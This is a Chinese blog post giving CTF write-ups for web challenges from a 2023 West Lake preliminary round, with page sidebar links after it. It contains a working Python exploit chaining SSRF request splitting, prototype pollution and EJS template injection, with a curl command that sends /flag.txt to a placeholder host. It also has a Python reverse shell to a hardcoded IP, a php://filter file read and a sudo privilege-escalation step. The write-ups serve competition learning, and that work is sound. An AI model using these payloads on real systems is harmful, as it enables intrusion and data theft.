西湖论剑初赛web wp

最新推荐文章于 2024-02-05 10:54:52 发布
最新推荐文章于 2024-02-05 10:54:52 发布
阅读量892 收藏 3
点赞数 2
分类专栏: 比赛 文章标签: 前端 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/129000039
版权

Node Magical Login

简单的js代码审计。

Flag分成了两部分。

第一部分:

image-20230212211609948

这里就简单的判断了一下user是否等于admin,直接绕过。

image-20230212211635351

第二部分:

image-20230212211645097

checkcode !== “aGr5AtSp55dRacer”,让其为真,利用数组绕过。

image-20230212211657153

Flag为:DASCTF{235657355 32540557696203746863296}

real_ez_node

找到类似的题目。

几道nodejs题目的分析_GAPPPPP的博客-CSDN博客_nodejs ssrf

里边Node Game这一道也是ssrf。

修改一下里边的代码,利用ssrf打原型链污染,然后ejs模板注入。

Exp:

import requests
import urllib.parse


def encode(a):
    tmp = u""
    for i in a:
        tmp += chr(0x0100+ord(i))
    return tmp

payload = ''' HTTP/1.1

POST /copy HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.76
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Connection: close
Content-Length: 170

{"constructor.prototype.outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('curl http://vps:port -F xx=@/flag.txt');var __tmp2"}
GET / HTTP/1.1
test:'''.replace("\n","\r\n")
payload = encode(payload)
re = requests.get('http://3000.endpoint-9a3d98e7aaf647ae8c64b7007bfc464b.m.ins.cloud.dasctf.com:81/curl?q=' + urllib.parse.quote(payload))
print(re.text)

image-20230212211747125

Flag为:DASCTF{10034776926713905225407173576398}

扭转乾坤

大写一个F即可

image-20230212211811179

DASCTF{407a13a21a6b85b1236b003479468c82}

unusual php

phpinfo发现test的拓展

image-20230212211827292

读php.ini

image-20230212211836461

读取so文件

http://url/?a=read&file=php://filter/convert.base64-encode/resource=/usr/local/lib/php/extensions/no-debug-non-zts-20190902/zend_test.so

反编译看一下存在对文件进行rc4解密操作

image-20230212211902335

那就对一句话rc4加密

image-20230212211912739

base64解码后保存为exp.php,上传发现需要提权

python -c “import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("81.69.247.186",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image-20230212211938045

尝试使用sudo发现tty问题,使用python加载一个pty

python3 -c 'import pty;pty.spawn("/bin/sh")'

image-20230212211957870

sudo进行cat,发现需要密码,在etc目录发现sudoers.bak备份文件,发现www用户chmod不需要密码

image-20230212212017741

直接上权限,读flag

flag为:DASCTF{20663467266566204775890084453113}

f0njl
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WP-2021西湖论剑
ce666666的博客
01-16 1090
2021西湖论剑-wp 前言 全靠大佬打,我是划水的。 灏妹的web 页面开发中 Dirsearch扫一下,idea泄露 ezupload 查看页面源代码,发现提示 ?source=1 发现使用_FILE进行上传,构造上传表单 访问并随便上传一个文件,放到bp里回显no 查看源码最后一个else,在此情况进行渲染temper/index.latte,同时文件也被写入temper。也就是我们上传index.latte的文件。 waf测试 {if “${nl /f*>1}”}{/if} 然后上
第15届全国大学生知识竞赛 2022ciscn初赛 部分wp
blowed的博客
05-31 1572
Misc ez_usb 1.键盘流量 USB协议数据部分在Leftover Capture Data域中,数据长度为八个字节。其中键盘击键信息集中在第三个字节中。 如图,发现击键信息为0x06,即对应的按键为C 2.鼠标流量 USB协议鼠标数据部分在Leftover Capture Data域中,数据长度为四个字节。 其中第一个字节代表按键,当取0x00时,代表没有按键、为0x01时,代表按左键,为0x02时,代表当前按键为右键。 第二个字节可以看成是一个signed byte类型,
2021西湖论剑web部分wp
fmyyy1的博客
11-21 1875
前言 快期末了 忙里偷闲打了西湖论剑,队伍第七,又被队友带飞了,web题目质量还可以 OA?RCE? 环境没有写的权限,本地有打通环境打不通的情况很多 之后在webmain/index/indexAction.php处 有个包含任意php文件 有个查看phpinfo的 看了之后开着register_argc_argv,尝试包含pearcmd payload 第一步 ?m=index&a=getshtml&surl=Li4vLi4vLi4vLi4vLi4vdXNyL2xvY2FsL2x
2019西湖论剑web wp
weixin_30307267的博客
04-12 630
发在正文前 这应该是自己在安全圈摸爬滚打两年多以来第一次正规的ctf比赛。没解出flag,没截图,只提供了一些思路。 遥想往昔,初入大学,带着对PT的向往,一个人穿行在幽暗的图书馆,翻阅啃读一本本安全书籍(后来事实证明,纯属瞎折腾。在此也表达下对那些无师自通的大
2024西湖论剑WP(reverse_MZ)
最新发布
ZJPC007的博客
02-05 639
有函数可知,根据转换得到48位的字符串并进行SHA1加密,密文为dc0562f86bec0a38508e704aa9faa347101e1fdb。因为转换过程中有多种可能,所以需要进行一些手搓的步骤,逐渐得到flag。思路大概就是先进行转换然后SHA1加密。逆向板块就做出这一题。
2021西湖论剑wp
qq_48511129的博客
11-22 1116
web OA?RCE? ⽐赛的时候试了下不是弱⼝令(实际上就是admin123,但当时忘试这个了),所以就去⽹上找了改密码 的⽅式,⽤这⾥的⽅法:信呼oa最新版本代码审计 - ma4ter $test = $this->jm- >strlook(json_encode(array("msgtype"=>"editpass","user"=>"admin","pass"=>"lighting")), 'd41d8cd98f00b2...
西湖论剑AI大数据安全分析赛-加密恶意流量检测赛道参赛源码+项目说明(初赛第一+决赛第二).zip
01-29
西湖论剑AI大数据安全分析赛-加密恶意流量检测赛道参赛源码+项目说明(初赛第一+决赛第二).zip西湖论剑AI大数据安全分析赛-加密恶意流量检测赛道参赛源码+项目说明(初赛第一+决赛第二).zip西湖论剑AI大数据安全...
DozerCTF-2nd:2019金陵科技学院校赛赛初赛web题源码及wp
03-23
web1果粉: 修改ua,包含iphone串口即可。 web2的React: 通过.index.php.swp还原出代码。 利用正则回溯机制导致的安全问题: import requests from io import BytesIO data = { 'greeting': BytesIO(b'Baby ...
第二届陇剑杯初赛题目汇总.zip
09-07
【标题】"第二届陇剑杯初赛题目汇总.zip" 是一个包含了多项网络安全竞赛题目的压缩文件,这届比赛聚焦于网络安全技术与技能的考察。从描述"陇剑杯bf-ezweb-hacked-hardweb-smallsword-wireshark1-tcpdump"中可以看出...
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2247
2022 CISCN 初赛pwn的完整wp
2023西湖论剑-(部分)WP
xccwxy的博客
02-03 2354
2023西湖论剑-(部分)WP
2022西湖论剑 部分wp
qq_61768489的博客
02-05 1534
拿到文件路径/usr/local/lib/php/extensions/no-debug-non-zts-20190902/zend_test.so。可以考虑用SSRF来绕过)读取 /proc/self/maps 查看当前进程的内存映射关系,发现加载了一个名为zend_test的扩展。参考此文https://xz.aliyun.com/t/9707#toc-11。提取出来,黑白像素转01二进制,注意要竖着跑 ,像素太多,我将结果保存到文件里。总之php文件被加密了,寻找加密猜测应该是有依赖,思路可以是读。
2022西湖论剑pwn部分wp
N1rvana的博客
02-05 900
西湖论剑2022pwn
2020西湖论剑Crypto BrokenSystem wp
weixin_44795952的博客
10-09 527
题目 打开压缩包的三个文件 查看加密代码 from Crypto.PublicKey import RSA from Crypto.Cipher import PKCS1_OAEP from secret import flag import os rsa = RSA.generate(2048) public_key = rsa.publickey().exportKey() f=open("public.key","w") f.write(public_key.decode()) f.close()
2021西湖论剑网络安全大赛部分WP
七堇年的博客
12-23 4778
2021西湖论剑网络安全大赛WP
西湖论剑 web
weixin_45805993的博客
11-24 554
Ezupload
2020西湖论剑Web复现
风过江南乱的博客
11-01 691
前言 总共5题,最简单的easyjson都没出。。。 题目 1、easyjson 题目源码 <?php include 'security.php'; if(!isset($_GET['source'])){ show_source(__FILE__); die(); } //生成沙箱文件夹 $sandbox = 'sandbox/'.sha1($_SERVER['HTTP_X_FORWARDED_FOR']).'/'; var_dump($sandbox); if(!fi
2022西湖论剑-初赛CTF部分wp-Zodiac
toto的博客
02-03 3431
2023西湖论剑初赛CTF部分wp
[西湖论剑 2022]Node Magical Login
m0_70819573的博客
04-12 269
传入Cookie:user=admin。2.路由/flag2。
NOIP普及组初赛模拟试题解析
"noip普及组初赛模拟试题01" 这篇资源主要涵盖了计算机基础知识和算法相关的知识点,适合准备NOIP普及组初赛的学生进行练习。试卷包含选择题,涉及了计算机内部数据表示、软件分类、互联网法院的技术应用、数据结构...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值